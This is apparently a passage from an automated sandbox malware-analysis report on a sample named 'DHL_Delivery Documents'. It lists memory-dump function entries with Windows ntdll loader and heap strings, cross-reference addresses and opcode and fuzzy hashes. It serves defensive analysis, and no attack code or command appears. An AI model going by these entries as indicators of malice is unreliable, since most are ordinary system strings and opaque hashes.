                        • Loading import redirection DLL: '%wZ', xrefs: 01C88170
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                        • API String ID: 0-475462383
                        • Opcode ID: 053e1695a3c82ee7df181d79bcb361425c787596380c4b29eec9946cd6b70168
                        • Instruction ID: a92847d53612f81394e27dbd3e9a329bc39dac49666c2ae2388a2b3e8e8b5e5b
                        • Opcode Fuzzy Hash: 053e1695a3c82ee7df181d79bcb361425c787596380c4b29eec9946cd6b70168
                        • Instruction Fuzzy Hash: B731E271648342EFC324EF29D98AE1AB7D5EFD4B14F04055CF9416B2A1EB20ED05D7A2
                        Strings
                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01C821BF
                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01C82178
                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01C8219F
                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01C82180
                        • RtlGetAssemblyStorageRoot, xrefs: 01C82160, 01C8219A, 01C821BA
                        • SXS: %s() passed the empty activation context, xrefs: 01C82165
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                        • API String ID: 0-861424205
                        • Opcode ID: 5115070d50254f481645699bbf1c83584ab8e020dfe96410158c0a1027418bcd
                        • Instruction ID: f42f2ea63fa7a1a01c96ba134e3c4087df6352274649266d11ae149bf86b0951
                        • Opcode Fuzzy Hash: 5115070d50254f481645699bbf1c83584ab8e020dfe96410158c0a1027418bcd
                        • Instruction Fuzzy Hash: B431243AA40215FBEB21DA9ADC8AF5A7A78DF65A84F15009DBB04A7150D770DE40C6A0
                        APIs
                          • Part of subcall function 01C52DF0: LdrInitializeThunk.NTDLL ref: 01C52DFA
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01C50BA3
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01C50BB6
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01C50D60
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01C50D74
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                        • String ID:
                        • API String ID: 1404860816-0
                        • Opcode ID: b0df3237c6e1776c8e338351034718907c8541aaccc0be1956309c0bcdb534f3
                        • Instruction ID: b9eeb6e9d916fa7c93624aa191aa29b4d9dbcd7495d66dae12984c526fce16ea
                        • Opcode Fuzzy Hash: b0df3237c6e1776c8e338351034718907c8541aaccc0be1956309c0bcdb534f3
                        • Instruction Fuzzy Hash: 37425971900715DFDB61CF28C881BAAB7F4BF44314F1485AAE989EB241E770EA84CF61
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                        • API String ID: 0-379654539
                        • Opcode ID: 0ac52ab2adca48bd324b4d7c4329706bd6726c515aa829841578d8ce855c57c1
                        • Instruction ID: 3ed5fa6edb19c483bb5e672b0ecac8fdc30f393c3ed0858939e95198f678cc96
                        • Opcode Fuzzy Hash: 0ac52ab2adca48bd324b4d7c4329706bd6726c515aa829841578d8ce855c57c1
                        • Instruction Fuzzy Hash: 75C1BC70149382CFD721CF59C044B6ABBE4FF96704F04886AF9968B259E374CA49EB52
                        Strings
                        • @, xrefs: 01C48591
                        • minkernel\ntdll\ldrinit.c, xrefs: 01C48421
                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01C4855E
                        • LdrpInitializeProcess, xrefs: 01C48422
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                        • API String ID: 0-1918872054
                        • Opcode ID: 1fdedcb8a1816aa1c5bc76a7a1183e9665e77acb6609fe52ff6ac238ed33d439
                        • Instruction ID: 63fb32ae32385c6c50a543f4acf91625ea0cc9a4f797a9a0edb48556b8537c8e
                        • Opcode Fuzzy Hash: 1fdedcb8a1816aa1c5bc76a7a1183e9665e77acb6609fe52ff6ac238ed33d439
                        • Instruction Fuzzy Hash: 1C91AD71508345EFE721EFA5CC84FABBAE8BF84744F40492EFA8492150E374DA44DB66
                        Strings
                        • .Local, xrefs: 01C428D8
                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01C822B6
                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01C821D9, 01C822B1
                        • SXS: %s() passed the empty activation context, xrefs: 01C821DE
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                        • API String ID: 0-1239276146
                        • Opcode ID: f0d826ad6db74f59f4204498f930acad5a25f58c10f43583efdde26e71d82cff
                        • Instruction ID: d37bf624fad41970d3a6efd36f3a833d64faace2f36fcefb3116927a1b06e1bd
                        • Opcode Fuzzy Hash: f0d826ad6db74f59f4204498f930acad5a25f58c10f43583efdde26e71d82cff
                        • Instruction Fuzzy Hash: 5EA1DF35904229DBDB24DF69DC89BA9B7B0BF68354F1501EAE908A7251D730DF80CF90
                        Strings
                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01C83437
                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01C83456
                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01C8342A
                        • RtlDeactivateActivationContext, xrefs: 01C83425, 01C83432, 01C83451
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                        • API String ID: 0-1245972979
                        • Opcode ID: 4d15e46c91bb51e429d2a7a6b759a322b4634712eb8be39b21677a5420619d5c
                        • Instruction ID: 0c4f6cac29aee2a7925ab25a2b4a768de357e71f181439cc8f9e406eb8568aec
                        • Opcode Fuzzy Hash: 4d15e46c91bb51e429d2a7a6b759a322b4634712eb8be39b21677a5420619d5c
                        • Instruction Fuzzy Hash: DD615536604B52DFD72ADF1DC881B2ABBE1FF80B64F28851DE9559B250D730E900CB95
                        Strings
                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01C70FE5
                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01C7106B
                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01C710AE
                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01C71028
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                        • API String ID: 0-1468400865
                        • Opcode ID: 4dee800ec9fa5e3759467ef06f157680db840de3586927b0da4ae9acb2969c25
                        • Instruction ID: a79ff51a0ab9d0ea17848581e6474e06f62a7de8c163269276c0275098527dc1
                        • Opcode Fuzzy Hash: 4dee800ec9fa5e3759467ef06f157680db840de3586927b0da4ae9acb2969c25
                        • Instruction Fuzzy Hash: A771E2B1944315EFCB21DF19C884B9B7FA8AF95754F000468FD498B28AD374D688EBD2
                        Strings
                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01C7A992
                        • minkernel\ntdll\ldrinit.c, xrefs: 01C7A9A2
                        • apphelp.dll, xrefs: 01C32462
                        • LdrpDynamicShimModule, xrefs: 01C7A998
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                        • API String ID: 0-176724104
                        • Opcode ID: 250a49c9c9e6a46dc488f12c39f9cad1539951b359b2331afbabe00e7031d6a7
                        • Instruction ID: 58320c5235bc874855f748f131c67944849d1b4a7fb904db1164250430b106d9
                        • Opcode Fuzzy Hash: 250a49c9c9e6a46dc488f12c39f9cad1539951b359b2331afbabe00e7031d6a7
                        • Instruction Fuzzy Hash: 8C314871600201EFDB36AF6E9885B6EB7B4FB84B10F190059E90067355C7B0DAA1DB80
                        Strings
                        • HEAP: , xrefs: 01C23264
                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01C2327D
                        • HEAP[%wZ]: , xrefs: 01C23255
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                        • API String ID: 0-617086771
                        • Opcode ID: 86f76bc6ec4e4406fd055504f9a55a4bd866c61675830cef7b6f561d65afa16b
                        • Instruction ID: e62ee5679b12b81dbf99f011e708ed2413d9ad4f10fabb980ec22a79ec9cbe73
                        • Opcode Fuzzy Hash: 86f76bc6ec4e4406fd055504f9a55a4bd866c61675830cef7b6f561d65afa16b
                        • Instruction Fuzzy Hash: B392AB71A042A9DFDB25CF69C444BAEBBF1FF48300F148099E94AAB751D739EA41CB50
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                        • API String ID: 0-4253913091
                        • Opcode ID: bb8b2228179250fb641e8065f08d5a9a25728448f6b7e0e09b0baf6b1324c1d4
                        • Instruction ID: a79329fd9a7397e6e18d2d5f11fdc4208a40f14567b8bafaeeb1a1e9cc08879a
                        • Opcode Fuzzy Hash: bb8b2228179250fb641e8065f08d5a9a25728448f6b7e0e09b0baf6b1324c1d4
                        • Instruction Fuzzy Hash: 7FF1DE30B00656DFEB26CF69C884B6ABBF5FF44700F14816AE5069B391D770EA91CB90
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: $@
                        • API String ID: 0-1077428164
                        • Opcode ID: e70368b42ad1d42d18fabee849959430192e71f8c674c6c4e89f66a2ab2b8e02
                        • Instruction ID: 02f57e3a64c757a9d6538d3baf998bdb646d15b6835c3e26f69b2886c2218928
                        • Opcode Fuzzy Hash: e70368b42ad1d42d18fabee849959430192e71f8c674c6c4e89f66a2ab2b8e02
                        • Instruction Fuzzy Hash: 1DC29FB1608392DFDB25CF29C880BABBBE5AFC8754F04892DF98987241D774D944CB52
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: FilterFullPath$UseFilter$\??\
                        • API String ID: 0-2779062949
                        • Opcode ID: 1abe1ae815e31ab7d0cc40b681dea771ece34da57d47dcd482ae3e8d09b17732
                        • Instruction ID: b3cceb0a52900193f9e2cf95605c9572dcadfcebb8b936560e8e28d2289cee87
                        • Opcode Fuzzy Hash: 1abe1ae815e31ab7d0cc40b681dea771ece34da57d47dcd482ae3e8d09b17732
                        • Instruction Fuzzy Hash: 59A12771911629DBDB21DB68CC88BAAB7B8EB48710F1041EAEA09A7250D735DF84CF54
                        Strings
                        • Failed to allocated memory for shimmed module list, xrefs: 01C7A10F
                        • minkernel\ntdll\ldrinit.c, xrefs: 01C7A121
                        • LdrpCheckModule, xrefs: 01C7A117
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                        • Instruction ID: d02772a0eaebd76f94d2ea801caeaa64977927d70f3422b552448ad768d1b5c1
                        • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                        • Instruction Fuzzy Hash: 19B12A31600656EFDB26DB68C850BBEBBF6AF44700F14056AE552D7381DB70EE41DB90
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ee30b5ea140514529fafc1a10ecef691a7e1caf1e5d17c475036d535e8485f1f
                        • Instruction ID: ec7bbe76f84f5718cf2ae6f236aae33fe8845bb094f569163ffcd4da1b66f300
                        • Opcode Fuzzy Hash: ee30b5ea140514529fafc1a10ecef691a7e1caf1e5d17c475036d535e8485f1f
                        • Instruction Fuzzy Hash: 76C15774108341CFE764CF19C494BAABBE5FF98704F44496DE98987291D7B4EA08CF92
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b240d962d68ad0b7dcf2b241ad05288d0be54f4ed3ac74c0fcfc2818a78d81e9
                        • Instruction ID: 5b56e22b721348c2b52357ddbe6f69ef48f7cbe26cf662d0d2c7499998bfd955
                        • Opcode Fuzzy Hash: b240d962d68ad0b7dcf2b241ad05288d0be54f4ed3ac74c0fcfc2818a78d81e9
                        • Instruction Fuzzy Hash: 6FB17074A00266CBDB75CF59C880BA9B3B5EF44700F0486E9D50AE7291EB31DEC6DB24
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 302d3b67cb451954090e9851d49bd885d3723f1c63ac04cabdb00664c05c58fc
                        • Instruction ID: f4c573e172597928e59080e5ced24e38414e548072a015fa45823c1ec3528e70
                        • Opcode Fuzzy Hash: 302d3b67cb451954090e9851d49bd885d3723f1c63ac04cabdb00664c05c58fc
                        • Instruction Fuzzy Hash: DFA13971E00619DFEB32DB58C888BAE7BB4BF45754F040115EA21AB291D7B4DE80CBD1
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3ba8a9a4039dec457ae1604563dfee848431c286dff47374c9433b29fd9431b5
                        • Instruction ID: 5d359735b239eb441ac8a2753c73829bdc1ac646faa55b679ebf0a7400aa6dae
                        • Opcode Fuzzy Hash: 3ba8a9a4039dec457ae1604563dfee848431c286dff47374c9433b29fd9431b5
                        • Instruction Fuzzy Hash: 79A1E070B00616DBDB65DF69C990BBABBB1FF44318F044029EE05D7282DB34E9A1DB94
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1882e8e6537d3d40b281694973c259d7a05b5fb1eea28b93476339e7fcd240f4
                        • Instruction ID: f82666ed7bff88cf17fb4c6b8b0ac43ba1c65ab31d7c941dd92fc4accb54247d
                        • Opcode Fuzzy Hash: 1882e8e6537d3d40b281694973c259d7a05b5fb1eea28b93476339e7fcd240f4
                        • Instruction Fuzzy Hash: EBA1FD72A00212EFC72ADF18C984B6ABBE9FF48704F450528F589DB650C338EE10CB91
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                        • Instruction ID: 5548cd05e7caa2a1218c768d1b6dd864edbbcd92edfc3cd59a93441b4658dda0
                        • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                        • Instruction Fuzzy Hash: 49B11471E0061ADFDF29CFA9C884BADBBF9BF48310F148129E915A7250D730EA51CB91
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e6dbf24b7b1c986bbf5e8353674cfedc49a85d6107febd3e0db14f3a97df3cc6
                        • Instruction ID: 4f88655a1dc4f6590ffe3af8969e8cf3f8e3342e9ad11347e6455c7a2ad3e2bc
                        • Opcode Fuzzy Hash: e6dbf24b7b1c986bbf5e8353674cfedc49a85d6107febd3e0db14f3a97df3cc6
                        • Instruction Fuzzy Hash: 44919271D00226EFDF15CFA9D888BAEBFB5AF48710F154169E611EB381D734DA409BA0
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 87a6aa9b8eecab68ccca768926dcb2610ee4598d5d853de1362bbed1fc1ff709
                        • Instruction ID: 4adc701f8f714cd35abc3b78e4fa85506c46b67c73d0180065b54585654b8276
                        • Opcode Fuzzy Hash: 87a6aa9b8eecab68ccca768926dcb2610ee4598d5d853de1362bbed1fc1ff709
                        • Instruction Fuzzy Hash: 5A911631A00636DBEB25DB6DC844BBDBBB1EF94724F058069E905AB380EB74DE41C751
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a234bfd2ce0194e67eaf0649068fc9e2bf33ebe0974701f0df68700260a3eaa3
                        • Instruction ID: d6cc9a9e13f48a424ed16e5146f776228a1fbe99502f116c212123dbc5d24a2a
                        • Opcode Fuzzy Hash: a234bfd2ce0194e67eaf0649068fc9e2bf33ebe0974701f0df68700260a3eaa3
                        • Instruction Fuzzy Hash: C7819471A00626EBDB18CF69C980ABEBBF9FB48700F14852EE545D7640E334D941CB94
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                        • Instruction ID: 69c8d37004fe947cf05d45dc02f79ba94e549c83cef3ae6135f5f4c77004c58a
                        • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                        • Instruction Fuzzy Hash: 4E816071A00209DFDF19CF99C890AAEBBF6FF84310F188569DA169B385D774EA01CB54
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d2b372948a12294d2680acda30b8a79c03e0223f979ba0d6edace17d5cae9b21
                        • Instruction ID: ea334e002812614a88b28b8eb676e051dc4344ee3f7f14bc796361879284d33b
                        • Opcode Fuzzy Hash: d2b372948a12294d2680acda30b8a79c03e0223f979ba0d6edace17d5cae9b21
                        • Instruction Fuzzy Hash: 0C818B71A04609EFDB26DFA9C880AEEBBFAFF88314F114429E555A7210D730ED45DB60
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: af82a6581761f5359124c94b506775a9ca960471a1da8fdb360e36635b20b7d0
                        • Instruction ID: a94c1f6bab0c50b079abeee0069d02205c5e28b683fb36611f01c2c76e8b6508
                        • Opcode Fuzzy Hash: af82a6581761f5359124c94b506775a9ca960471a1da8fdb360e36635b20b7d0
                        • Instruction Fuzzy Hash: BC71CD75D0062ADBCB26CF59D8907BEBBB5FF58B10F14411AEA42AB350E374D910CBA4
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4f098d2ce511bd18231fdbd995b15e609e0f578f9ab03fa0dc45391f43ca42c9
                        • Instruction ID: 237c6175675d24c81a091da6cfd394c72aacb1baca35d4ebf413ae774a02d734
                        • Opcode Fuzzy Hash: 4f098d2ce511bd18231fdbd995b15e609e0f578f9ab03fa0dc45391f43ca42c9
                        • Instruction Fuzzy Hash: 80718D70900205EFDB29CF9DD955A9ABBF8EF90B10B10815EE604A7398C731CE90DB68
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0fdc7dddf5d41f75a5f3eedcd127ba5d11adebb2fdd27c92bca00cbe0105f004
                        • Instruction ID: 2a0021282fc7c2b93f5f3be16538d37080fcfaad9b4d0c85bcda1930b7666590
                        • Opcode Fuzzy Hash: 0fdc7dddf5d41f75a5f3eedcd127ba5d11adebb2fdd27c92bca00cbe0105f004
                        • Instruction Fuzzy Hash: 9171B036604662CFD322DF2CC480B6AB7E5FF88710F0485AAE895CB356DB74D946CB91
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                        • Instruction ID: 7cc2cbe691781fd15fe7087a24408ae6e61384e48d669ac7bc3c3a7827975017
                        • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                        • Instruction Fuzzy Hash: 20716C71A0061AEFDB10DFA9C988AEEBBB8FF48710F144569E505E7250DB34EA41DB90
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8aa27ca2c628b05ee1972804b33cb27f052122ae296eb9df1381a56dea76b774
                        • Instruction ID: ddba76e50452da5c4c52bb83c2377ccfcf7589776e4329c42d20865264caacae
                        • Opcode Fuzzy Hash: 8aa27ca2c628b05ee1972804b33cb27f052122ae296eb9df1381a56dea76b774
                        • Instruction Fuzzy Hash: FB710232200B22EFE733CF18C844F66BBE6EF44728F584518E616872A0D775E945DB50
                        Memory Dump Source
